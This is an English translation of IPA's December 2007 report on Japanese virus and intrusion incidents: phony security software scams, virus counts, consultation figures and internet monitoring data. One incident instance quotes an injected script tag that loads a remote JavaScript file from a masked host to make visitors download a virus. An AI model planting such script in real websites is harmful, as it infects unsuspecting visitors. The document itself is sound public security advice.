| This is a summary of
computer virus/unauthorized computer access incident reports for
December, 2007 and its annual review of 2007 compiled by IPA.
I.
Reminder for the Month:
“You
may have been deceived by those messages…?”
-
Be cautious with the hard selling of phony security measures software!!
-
Relatively huge number
of consultations relevant to hard selling of phony security measures
software from users is rushed to IPA every month. Of some consultation
is: a user easily installed the said security measures software
as the product name is written in Roman characters so that the user
seemed it is natural. Hard selling of phony security measures
software itself is not a new engineering; number of users could
get rid of facing damages as the messages being displayed on and
the product names are mostly written in English. However, recently,
such messages/product names tending to be written in Japanese with
Roman characters such as (i) VirusuWadame (No viruses), (ii) KyoiKanshi
(Threat monitoring) and (iii) Kansen Nashi (No infection), etc.
are observed. Since they do not appear to be big difference with
typical security measures software at a glance, most of users undoubtedly
installed them and face damages in the event.
(1) What is the
hard selling of phony security measures software…?
Have you ever had one
of following messages such as “Virus is developed from your computer”,
“Your computer is in error state”? Then you might have been
recommended to “purchase the security measures software” shown
on the screen to resolve that problems? In most of cases,
this is a malicious activity which displays phony messages as if
there is some problem and attempts to have users pay for the security
measures software. Even you pay for it, none of problem
is resolved as there is no problem originally in your computer.
For instance, some messages
and images shown in the Chart 1-1 may be displayed when you click
an image on the banner ad at the top of homepage (image ad on homepage)
as if there actually are problems in your computer.
Chart
1-1: An instance of phony message
Then it prompts you to
click the button shown at the chart 1-1 (b) if you wish to know
further details of the problems. To tell you the truth, it induces
you to download phony security measures software when you click
the button. The phony software often functions differently with
typical legitimate security measures software. The “phony security
measures software” being installed in your computer continually
displays message on the screen to prompts you to purchase the software
over and over until you settle it with your credit card.
(2) Measures
The “phony security measures
software” is often priced relatively cheap. Naturally, some users
prefer to pay for it as the shortcut in case you do not know how
to erase such message and do not want to be annoyed by the message
which prompts you to purchase the software. Be cautious!
Even you pay for it, such messages will not stop urge you to purchase
the security measures software! You should never, ever pay for it.
You should not click any buttons on the screen hastily even though
the message shown in the Chart 1-1 is shown while you were browsing
some homepages. The best measure you have to take is to immediately
close the browser and do not go forward. Generally, legitimate
manufacturer and provider of security measures software do not send
such message shown in the Chart 1-1 one-sidedly.
In case you'd installed
the “security measures software” incidentally and there is no
way to erase the message from the screen, the “phony security
measures software” should be removed from the “Program
additions/deletions” field by clicking the “Start”
button at the bottom part of the left-hand side corner
and selecting “Control Panel” there.
(3) Just
in case…
Some computer may appear
lack of stability with the following symptoms: the computer cannot
connect to the Internet or it processes slower than before, etc.
When such symptom is appeared, be sure to restore the following
systems. Though the symptom is not remedied, the last resort you
have to take is to initialize your computer.
(a) Restoring the
current system to the normal state with the system restoration function
Windows automatically selects
arbitrary day to store the system status of the day in case the
computer unstably behaves and/or shows significant troubles for
use. Windows furnishes “system restoration” function to restore
the computer to the normal state based on the information previously
stored. The arbitrary day when the system state is stored can also
be configured by the user.
Please refer to the Microsoft's
homepage to restore the normal state using Windows “system restoration”
function. Please also be noted if you'd installed some application
software, conducted updates, etc. somewhere in between the arbitrary
day selected to today, you are to redo them after the system is
thoroughly restored as the previously installed patches, etc. will
not be applied. However, documents created from the arbitrary day
to today, in- and out-bound e-mails, URLs you'd accessed and favorite
URLs you'd listed are maintained.
“System Restoration”
http://www.microsoft.com/windowsxp/using/setup/support/sysrestore.mspx
(b) Initialization
of computer
This is the work to get back
your computer to the initial state when purchased. As for the actual
procedures, please follow to the “getting back the computer to
the initial state when purchased” column on the instruction booklet
attached to your computer upon purchased. Be sure to back-up important
data, information to the outside media, etc. before you initiate
initialization work.
*IPA will not bear responsibility
to the troubles, losses or damages caused by the said initialization
work conducted by you. The work shall be processed with your calm
judgment under your fully responsibility.
<Reference>
IPA – Seven Virus Requirements
for Computer Users (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
IPA – Five Anti-spyware
Requirements for Computer Users (in Japanese)
http://www.ipa.go.jp/security/antivirus/spyware5kajyou.html
II.
Reporting Status for Computer Virus
– further details, please refer to the
Attachment 1
–
The detection number [1]
of virus in December was about 0.34M : decreased
about 40% from 0.60M reported in November.
In addition, the reported number [2]
for December was 2,239: it was also decreased
4.8% from 2,351 the number in November.
| [1]Detection
number: |
Reported
virus counts (cumulative) found by a filer. |
[2]Reported
number: |
Virus counts are
aggregated: viruses of same type and variants reported on
the same day are counted as one case number regardless how
many viruses or the actual number of viruses is found by the
same filer on the same day. In December, the reported number
was 2,239: aggregated virus detection number was about 0.34M.
|
The worst detection number
of virus was W32/Netsky with about 0.30M
, W32/Stration with about 0.023M
and W32/Mytob with about 0.011
subsequently followed.
Chart
2-1
Chart
2-2
Note) Numbers in the parenthesis
are the Numbers for previous month.
III.
Reporting Status for Unauthorized Computer
Access (includes Consultations) –
Please refer to the Attachment 2 –
Report for unauthorized
computer access and status of consultation
|
July |
Aug. |
Sept. |
Oct. |
Nov. |
Dec. |
Total
for Reported (a) |
10 |
16 |
10 |
10 |
15 |
14 |
| |
Damaged
(b) |
8 |
13 |
8 |
9 |
11 |
7 |
Not
Damaged (c) |
2 |
3 |
2 |
1 |
4 |
7 |
Total
for Consultation (d) |
25 |
23 |
27 |
37 |
31 |
21 |
| |
Damaged
(e) |
11 |
15 |
12 |
22 |
17 |
16 |
Not
Damaged (f) |
14 |
8 |
15 |
15 |
14 |
5 |
Grand
Total (a + d) |
35 |
39 |
37 |
47 |
46 |
35 |
| |
Damaged
(b + e) |
19 |
28 |
20 |
31 |
28 |
23 |
Not
Damaged (c + f) |
16 |
11 |
17 |
16 |
18 |
12 |
(1) Reporting Status for
Unauthorized Computer Access
Reported number
for November was 14: of 7 was the number
actually damaged .
(2) Accepting Status for
Consultations relevant to Unauthorized Computer Access
Consultation number relevant
to unauthorized computer access was 21: of 16 (of 2 was also counted
as reported number) was the actual number that some sort of damage
was reported.
(3) Status of Damage
The breakdown of reported
damage was: intrusion with 4 , DoS attack
with 1 and others (damaged) with 2 .
The damages relevant to intrusion were mainly caused by the alteration
of web contents with 4: of 2 were really harmful that some traps
were embedded which automatically jump to the malicious site which
inducing users download virus when he/she simply accessed to a certain
site. In addition, locating malicious contents to exploit for phishing
with 1 was also counted.
The cause of intrusion
was: insufficient configuration with 1; as for the other 3 cases,
we could not identify them, however, it can be assumed that leaving
vulnerability either in the server OS or in applications are the
major causes. As for the causes for the others (damaged), such damage
that the user's avatar and/or virtual money to be used on a RPG
(role playing game) was missing was counted as 1 case.
*Phishing: One
of malicious engineering which induces users to fabulous web pages
spoofing to be actual business such as legitimate financial institution,
etc. to exploit users' IDs and passwords.
(4)
Damage Instances:
[Intrusion]
(i)
Web site was altered…
<Instance>
- A general user
who browsed this business's site communicated that “virus alerts
were appeared by anti-virus software as soon as the user accessed
the site”.
- Study was conducted
and realized that number of fields within a database was
being altered by following code ? <script src=” http://(omitted).net/0.js
></script> ? .
- Because of
this script, a user automatically downloaded virus when he/she simply
browsed the site.
[Others (Damaged)]
(ii) Items to be
used on online games were missing…
<Instance>
- Because of
home computer's failure, I'd enjoyed playing RPG (role playing games)
at
a comic café.
- When I re-logged
in a couple days later, my avatar was differently located where
I
previously logged out.
- I felt it suspicious
and study was conducted, accordingly. Then I have realized that
some arms for my avatar and virtual money to be used for online
games were
missing.
- According
to my game buddies, they'd seen someone was logged in to be myself
while I was away from the games.
IV.
Accepting Status of Consultation
The gross number of the
consultation in December was 389. Of the consultation
relevant to “ One-click Billing Fraud ” was
significantly decreased with 43
(November: 264). This may be the cause that an
offender with the one-click billing fraud was arrested in the end
of November last year. As for the others, the consultation relevant
to “ Winny ” with 19
(November: 31), the consultation relevant to “
Hard selling of phony security measures software ”
with 11
(November: 14), etc. were also realized.
Movement in entire number
of consultation accepted by IPA
/method
|
July |
Aug. |
Sept. |
Oct. |
Nov. |
Dec. |
Total
|
1162 |
1013 |
910 |
1128 |
911 |
389 |
| |
Automatic
Response System |
694 |
593 |
544 |
669 |
520 |
222 |
Telephone
|
403 |
374 |
310 |
397 |
337 |
109 |
e-mail
|
64 |
43 |
55 |
57 |
52 |
56 |
Fax,
Others |
1 |
3 |
1 |
5 |
2 |
2 |
*IPA consults/advises
for computer viruses/unauthorized computer accesses as well as the
other information concerning overall security issues
Mail: 
for virus issues,  for
crack issues.
Tel.: +81-3-5978-7509
(24-hour automatic response)
Fax: +81-3-5978-7518
(24-hour automatic response)
*The Total case number
includes the number in Consultation (d) column of the Chart in the
“IV. Reported Status for Unauthorized Computer Access” and “V.
Accepting Status of Consultation”.
*”Automatic Response
System”: Accepted numbers by automatic response
*“Telephone”:
Accepted
numbers by the Security Center personnel
<Reference>
Shift
in Number of Consultation relevant to One-click Billing Fraud
The major consultation
instances are as follows.
(i) The data stored
within a privately owned computer was deviated on a Winny network…
Consultation:
I am using Winny with
a privately owned computer. Materials for my work are also stored
in that computer. One day, I have find out such posting on one e-bulletin
board saying that the data stored within a computer was being deviated.
I have checked and realized that the said data was deviated from
my computer. My computer was probably infected by virus so that
the data was deviated. Could you tell how do I respond?
Response:
It is highly probable
that the data to be used for work is deviated as well ,
be sure to conduct following procedures:
(1) Reports to
the parties involved
Be sure to communicate
with the parties involved with the work including your supervisor
immediately. Do not think of fixing it personally: be sure
to follow to the instructions provided by the emergency response
team (department) in your firm.
(2) Handling the
computer
First of all, the computer
in which information was deviated should be disconnected from the
Internet. Do not remove Winny or delete files in that computer
at this stage as they are necessary to identify data being deviated.
For the other procedures,
please refer to the following URLs.
<Reference>
IPA – How to Prevent Information
Leakage by Winny (in Japanese)
http://www.ipa.go.jp/security/topics/20060310_winny.html
IPA – Responding Tips for
Information Leakage Accident (in Japanese)
http://www.ipa.go.jp/security/awareness/johorouei/
(ii)
Being Infected by Virus…?
Consultation:
I have been having following
symptoms a couple of weeks ago. My computer may be infected by virus.
- I'd attempted
to update my computer, but the relevant pages are not appeared.
- Anti-virus
software cannot be downloaded.
- Vendors for
anti-virus software cannot be browsed (the other sites are appeared).
- I have tried
to conduct fee on-line virus scan, I was automatically sent to
unrelated shopping site or the computer displays “unable to display
your requested
pages.”, etc.
Response:
Study was conducted and it
was realized that the traps which disabling to access to legitimate
sites were embedded (host file alteration). It is highly probable
that your computer was infected by virus so that we attempted system
restoration, but the function itself was already disabled. Since
the damage caused by virus was widely spreaded over, we encourage
you to initialize your computer. Herewith, it is very difficult
to restore once a computer is infected by virus. Accordingly, it
is important to conduct preventive measures on a routine basis.
<Reference>
IPA – Seven Virus Requirements
for Computer Users (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
V.
Accessing Status Captured by the Internet Monitoring (TALOT2”)
in December
According to the Internet
Monitoring (TALOT2), the total of unwanted (one-sided) number of
access in December 2007 was 218,942 for 10 monitoring
points. That is, the number of access was 706
from 235 source addresses/monitoring point/day.
Since each monitoring
environment for the TALOT2 is nearly equal to the general connection
environment used for the Internet; it can be considered that the
same amount of unwanted (one-sided) access can be monitored for
the general Internet users' connection environment. In another word,
your computer is being accessed from 235 unknown source
addresses in average/day or you are being accessed about 3 times
from one source address which considered unauthorized.
Chart
5-1 Unwanted (One-sided) Number of Access and Source Number
of Access/Monitoring Point/Day
The Chart 5-1 shows the
unwanted (one-sided) number of access and the unwanted (one-sided)
source number of access/monitoring point/day from January to December
2007. According to this chart, both the unwanted (one-sided) accesses
in December were decreased than the ones in November and showed
lowest figures ever as the number of access/source number of access/day
in 2007. However, it seemed that the access contents are entirely
stabilized.
Both unwanted (one-sided)
accessing status/day in single month in 2007 were tending moderately
decreased from June regardless of the type of access (see the
Chart 5-2).
Chart
5-2: Shift in Access Type (Destination)/Monitoring Point/Day
Chart
5-3: Unwanted (One-sided) Number of Access and Source Number of
Access/Monitoring Point/Day from June 2004 to
December 2007
It is not for sure why
number of access/source number of access was decreased. The cause
may be:
• Significant
infection damage by worm and/or virus targeting Windows vulnerability
was
lowered;
• Effects
of anti-bot measures provided by the CCC ( Cyber Clean Center
), the
collaborative
project in between MIC (Ministry of Internal Affairs and
Communications)
and METI (Ministry of Economy, Trade and Industry).
• Security
measures is improved as those computers used by individual users
and
businesses
are replaced by newer ones or are employed more sophisticated
OSs .
As for (1) above, it can
also be seen in the reported numbers of virus and detection number
of virus in the computer virus report are decreased; however,
anti-spam measures and anti-virus measures by respective providers
are mainly worked out to prevent from enlarging infection damage.
<Referential Information>
Reporting Status of Computer
Virus for 2007
http://www.ipa.go.jp/security/english/virus/press/200712/virus2007.html
The (2) above seems effective
for those seemed from the access by bot virus. In the CCC, distribution
of bot removal tools is committed and virus alert mails are sent
to those users whose computers may have been infected by bot virus
with the collaboration of ISPs (Internet Service Providers).
<Referential Information>
CCC ( Cyber Clean Center
), the Collaboration project in between MIC and METI (in Japanese/partially
in English)
https://www.ccc.go.jp/en_index.html
Bot Removal Procedures
(in Japanese)
https://www.ccc.go.jp/flow/index.html
Alerting Activities (in
Japanese)
https://www.ccc.go.jp/activity/index.html
Brochure for Anti-bot Measures (PDF
file)
http://www.ipa.go.jp/security/english/virus/antivirus/pdf/Bot_measures_eng.pdf
As for (3) above, the newer
OS (Windows Vista) was released in January 2007: we assume when
individual and business users replace newer OSs and/or systems,
bot virus, etc. may be discarded along with legacy computers and/or
systems if worms and viruses may have been infected while users
do not know.
In addition, newer OSs
and systems furnish up to dated anti-virus software as default
even it is a limited time offer: users do not want to miss this
superb opportunity that the software provides users latest security!
In relation to the above
information, please also refer to the following site for further
details.
- Attachment
3 Observation Status by Internet Monitoring System (TALOT2)
- Attachment
4 “Report Status for Computer Virus 2007”
- Attachment
5 “Report Status for Unauthorized Computer Access 2007”
|
Japanese